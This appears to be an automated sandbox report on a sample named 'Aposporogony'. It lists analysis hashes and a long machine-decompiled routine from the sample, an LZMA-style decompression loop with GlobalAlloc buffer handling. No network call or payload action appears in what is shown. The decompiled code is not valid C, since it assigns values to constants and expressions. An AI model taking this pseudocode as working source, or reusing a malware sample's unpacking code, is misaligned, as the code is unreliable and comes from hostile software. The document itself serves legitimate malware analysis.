                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: E5G$:
                                                                                                                                                                                      • API String ID: 0-1996714138
                                                                                                                                                                                      • Opcode ID: be9ececc3960e4b8e93d255fa7991c4e3ab919e6a38d76223c03a0e84d35ab48
                                                                                                                                                                                      • Instruction ID: a697f286fb32a04aa80bb9cf859fb68f9ef976542f464a0444f3022d09cb39a1
                                                                                                                                                                                      • Opcode Fuzzy Hash: be9ececc3960e4b8e93d255fa7991c4e3ab919e6a38d76223c03a0e84d35ab48
                                                                                                                                                                                      • Instruction Fuzzy Hash: AB127A2252DD1C6ED24AAA38989A075335AEE8322573588DFC5C3CFD99D973CCE28354
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                                                      			E00406AF2() {
                                                                                                                                                                                      				unsigned short _t531;
                                                                                                                                                                                      				signed int _t532;
                                                                                                                                                                                      				void _t533;
                                                                                                                                                                                      				void* _t534;
                                                                                                                                                                                      				signed int _t535;
                                                                                                                                                                                      				signed int _t565;
                                                                                                                                                                                      				signed int _t568;
                                                                                                                                                                                      				signed int _t590;
                                                                                                                                                                                      				signed int* _t607;
                                                                                                                                                                                      				void* _t614;
                                                                                                                                                                                      
                                                                                                                                                                                      				L0:
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L0:
                                                                                                                                                                                      					if( *(_t614 - 0x40) != 0) {
                                                                                                                                                                                      						 *(_t614 - 0x34) = 1;
                                                                                                                                                                                      						 *(_t614 - 0x84) = 7;
                                                                                                                                                                                      						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                                                                                                                      						L132:
                                                                                                                                                                                      						 *(_t614 - 0x54) = _t607;
                                                                                                                                                                                      						L133:
                                                                                                                                                                                      						_t531 =  *_t607;
                                                                                                                                                                                      						_t590 = _t531 & 0x0000ffff;
                                                                                                                                                                                      						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                                                                                                                      						if( *(_t614 - 0xc) >= _t565) {
                                                                                                                                                                                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                                                                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                                                                                                                      							 *(_t614 - 0x40) = 1;
                                                                                                                                                                                      							_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                      							 *_t607 = _t532;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							 *(_t614 - 0x10) = _t565;
                                                                                                                                                                                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                                                                                      							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                                                                                                                      							L139:
                                                                                                                                                                                      							_t533 =  *(_t614 - 0x84);
                                                                                                                                                                                      							L140:
                                                                                                                                                                                      							 *(_t614 - 0x88) = _t533;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							L137:
                                                                                                                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                                      								 *(_t614 - 0x88) = 5;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                                                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							goto L139;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                      						__esi =  *(__ebp - 0x60);
                                                                                                                                                                                      						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                      						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                      						__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                      						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                      						__ecx =  *(__ebp - 4);
                                                                                                                                                                                      						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                      						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                      						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      						if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                      							if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                      								_t97 = __ebp - 0x38;
                                                                                                                                                                                      								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							 *(__ebp - 0x38) = 0;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                      							__ebx = 0;
                                                                                                                                                                                      							__ebx = 1;
                                                                                                                                                                                      							L60:
                                                                                                                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      							__edx = __ebx + __ebx;
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      							__esi = __edx + __eax;
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      							__ax =  *__esi;
                                                                                                                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      								__cx = __ax;
                                                                                                                                                                                      								_t216 = __edx + 1; // 0x1
                                                                                                                                                                                      								__ebx = _t216;
                                                                                                                                                                                      								__cx = __ax >> 5;
                                                                                                                                                                                      								 *__esi = __ax;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      								0x800 = 0x800 - __edi;
                                                                                                                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                                                                                      								 *__esi = __cx;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      								L59:
                                                                                                                                                                                      								if(__ebx >= 0x100) {
                                                                                                                                                                                      									goto L54;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L60;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								L57:
                                                                                                                                                                                      								if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      									 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                      									goto L170;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      								__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      								_t202 = __ebp - 0x70;
                                                                                                                                                                                      								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      								goto L59;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 8);
                                                                                                                                                                                      							__ebx = 0;
                                                                                                                                                                                      							__ebx = 1;
                                                                                                                                                                                      							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      							L40:
                                                                                                                                                                                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                      							 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                      							__eax = __eax + 1;
                                                                                                                                                                                      							__eax = __eax << 8;
                                                                                                                                                                                      							__eax = __eax + __ebx;
                                                                                                                                                                                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      							__ax =  *__esi;
                                                                                                                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      							__edx = __ax & 0x0000ffff;
                                                                                                                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      								__cx = __ax;
                                                                                                                                                                                      								 *(__ebp - 0x40) = 1;
                                                                                                                                                                                      								__cx = __ax >> 5;
                                                                                                                                                                                      								__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                      								 *__esi = __ax;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      								0x800 = 0x800 - __edx;
                                                                                                                                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                                                                                      								 *__esi = __cx;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      								L38:
                                                                                                                                                                                      								__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                      										if(__ebx >= 0x100) {
                                                                                                                                                                                      											break;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      										__edx = __ebx + __ebx;
                                                                                                                                                                                      										__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      										__esi = __edx + __eax;
                                                                                                                                                                                      										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      										__ax =  *__esi;
                                                                                                                                                                                      										 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      										__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      										if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      											__cx = __ax;
                                                                                                                                                                                      											_t169 = __edx + 1; // 0x1
                                                                                                                                                                                      											__ebx = _t169;
                                                                                                                                                                                      											__cx = __ax >> 5;
                                                                                                                                                                                      											 *__esi = __ax;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      											0x800 = 0x800 - __edi;
                                                                                                                                                                                      											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      											__ebx = __ebx + __ebx;
                                                                                                                                                                                      											 *__esi = __cx;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                                                                                                                      											L45:
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t155 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L53:
                                                                                                                                                                                      									_t172 = __ebp - 0x34;
                                                                                                                                                                                      									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                      									L54:
                                                                                                                                                                                      									__al =  *(__ebp - 0x44);
                                                                                                                                                                                      									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                      									L55:
                                                                                                                                                                                      									if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                      										 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                      										goto L170;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                      									__al =  *(__ebp - 0x5c);
                                                                                                                                                                                      									__edx =  *(__ebp - 8);
                                                                                                                                                                                      									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                      									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                      									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                      									 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                      									__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                      									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                      									__eax = __ecx + 1;
                                                                                                                                                                                      									__edx = 0;
                                                                                                                                                                                      									_t191 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                      									__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                      									__edx = _t191;
                                                                                                                                                                                      									L79:
                                                                                                                                                                                      									 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                      									L80:
                                                                                                                                                                                      									 *(__ebp - 0x88) = 2;
                                                                                                                                                                                      									goto L1;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(__ebx >= 0x100) {
                                                                                                                                                                                      									goto L53;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L40;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								L36:
                                                                                                                                                                                      								if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      									 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                      									L170:
                                                                                                                                                                                      									_t568 = 0x22;
                                                                                                                                                                                      									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                                                                                                                      									_t535 = 0;
                                                                                                                                                                                      									L172:
                                                                                                                                                                                      									return _t535;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      								__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      								_t121 = __ebp - 0x70;
                                                                                                                                                                                      								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      								goto L38;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					_t534 =  *(_t614 - 0x88);
                                                                                                                                                                                      					if(_t534 > 0x1c) {
                                                                                                                                                                                      						L171:
                                                                                                                                                                                      						_t535 = _t534 | 0xffffffff;
                                                                                                                                                                                      						goto L172;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					switch( *((intOrPtr*)(_t534 * 4 +  &M00407395))) {
                                                                                                                                                                                      						case 0:
                                                                                                                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                                      							_t534 =  *( *(_t614 - 0x70));
                                                                                                                                                                                      							if(_t534 > 0xe1) {
                                                                                                                                                                                      								goto L171;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t538 = _t534 & 0x000000ff;
                                                                                                                                                                                      							_push(0x2d);
                                                                                                                                                                                      							asm("cdq");
                                                                                                                                                                                      							_pop(_t570);
                                                                                                                                                                                      							_push(9);
                                                                                                                                                                                      							_pop(_t571);
                                                                                                                                                                                      							_t610 = _t538 / _t570;
                                                                                                                                                                                      							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                                                      							asm("cdq");
                                                                                                                                                                                      							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                                                      							 *(_t614 - 0x3c) = _t605;
                                                                                                                                                                                      							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                                                                                                                      							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                                                      							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                                                                                                                      							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                                                                                                                      								L10:
                                                                                                                                                                                      								if(_t613 == 0) {
                                                                                                                                                                                      									L12:
                                                                                                                                                                                      									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                                                                                                                      									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                                                                                      									goto L15;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L11;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								do {
                                                                                                                                                                                      									L11:
                                                                                                                                                                                      									_t613 = _t613 - 1;
                                                                                                                                                                                      									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                                                                                                                      								} while (_t613 != 0);
                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if( *(_t614 - 4) != 0) {
                                                                                                                                                                                      								GlobalFree( *(_t614 - 4));
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                      							 *(_t614 - 4) = _t534;
                                                                                                                                                                                      							if(_t534 == 0) {
                                                                                                                                                                                      								goto L171;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                                                                                                                      								goto L10;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 1:
                                                                                                                                                                                      							L13:
                                                                                                                                                                                      							__eflags =  *(_t614 - 0x6c);
                                                                                                                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                                      								 *(_t614 - 0x88) = 1;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                                                                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                                      							_t45 = _t614 - 0x48;
                                                                                                                                                                                      							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                                                                                                                      							__eflags =  *_t45;
                                                                                                                                                                                      							L15:
                                                                                                                                                                                      							if( *(_t614 - 0x48) < 4) {
                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t546 =  *(_t614 - 0x40);
                                                                                                                                                                                      							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                                                                                                                      								L20:
                                                                                                                                                                                      								 *(_t614 - 0x48) = 5;
                                                                                                                                                                                      								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                      								goto L23;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(_t614 - 0x74) = _t546;
                                                                                                                                                                                      							if( *(_t614 - 8) != 0) {
                                                                                                                                                                                      								GlobalFree( *(_t614 - 8));
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                                                                                                                      							 *(_t614 - 8) = _t534;
                                                                                                                                                                                      							if(_t534 == 0) {
                                                                                                                                                                                      								goto L171;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 2:
                                                                                                                                                                                      							L24:
                                                                                                                                                                                      							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                                                                                                                      							 *(_t614 - 0x84) = 6;
                                                                                                                                                                                      							 *(_t614 - 0x4c) = _t553;
                                                                                                                                                                                      							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                                      							goto L132;
                                                                                                                                                                                      						case 3:
                                                                                                                                                                                      							L21:
                                                                                                                                                                                      							__eflags =  *(_t614 - 0x6c);
                                                                                                                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                                      								 *(_t614 - 0x88) = 3;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                                      							_t67 = _t614 - 0x70;
                                                                                                                                                                                      							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                                      							__eflags =  *_t67;
                                                                                                                                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							L23:
                                                                                                                                                                                      							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                                                                                                                      							if( *(_t614 - 0x48) != 0) {
                                                                                                                                                                                      								goto L21;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                      						case 4:
                                                                                                                                                                                      							goto L133;
                                                                                                                                                                                      						case 5:
                                                                                                                                                                                      							goto L137;
                                                                                                                                                                                      						case 6:
                                                                                                                                                                                      							goto L0;
                                                                                                                                                                                      						case 7:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      								 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      								__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      								__eax = 0;
                                                                                                                                                                                      								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      								__al = __al & 0x000000fd;
                                                                                                                                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                                                                                      								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                                                      								 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      								goto L68;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax =  *(__ebp - 4);
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      							 *(__ebp - 0x84) = 8;
                                                                                                                                                                                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      							goto L132;
                                                                                                                                                                                      						case 8:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      								 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eax =  *(__ebp - 0x38);
                                                                                                                                                                                      								__ecx =  *(__ebp - 4);
                                                                                                                                                                                      								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                      								 *(__ebp - 0x84) = 9;
                                                                                                                                                                                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L132;
                                                                                                                                                                                      						case 9:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      								goto L89;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                      							if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                      								goto L171;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax = 0;
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x38) - 7;
